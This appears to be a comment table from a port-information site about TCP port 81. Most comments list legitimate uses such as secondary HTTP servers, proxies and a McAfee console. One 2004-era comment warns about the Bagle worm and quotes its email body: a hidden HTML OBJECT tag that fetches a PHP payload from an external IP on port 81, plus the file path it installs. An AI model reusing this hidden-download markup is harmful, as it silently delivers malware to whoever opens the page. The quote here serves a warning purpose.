| Submitted By |
Date |
| Comment |
| Steve Arnold |
2009-10-04 18:45:22 |
| Reported today by Sophos as the port used by the e-mailed "carrier" (VBS
script) of W32/Bagle-Q to download the virus. |
| TomazF |
2009-10-04 18:45:22 |
| new version (18.03.2004) of worm Beagle is working on port 81, opens PHP with ActiveX script ans install sm.exe -> \winnt\system32\directs.exe and infects then plenty of EXEs
see virus email body:
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://219.15.112.80:81/257480.php">
</OBJECT></body></html>
Rgrds,
Tomaz |
| Diesel |
2008-05-15 14:28:49 |
| this port is used between http proxies |
| Just found |
2008-04-29 18:22:33 |
| igo-incognito user-authentication-for-watchguard-products
IGo Incognito Data Port http://www.watchguard.com/training/lss/45/auth3.ht | http://www.micromuse.com/products/descriptions.htm | IGo Incognito Data Port |
| Joshua |
2004-03-19 04:46:52 |
| Secondary HTTP servers are often found on ports 81 through 83. |
| Tinga |
2004-02-10 19:49:57 |
| Port is also used for McAfee ePO console to server communications |
https://www.sans.edu
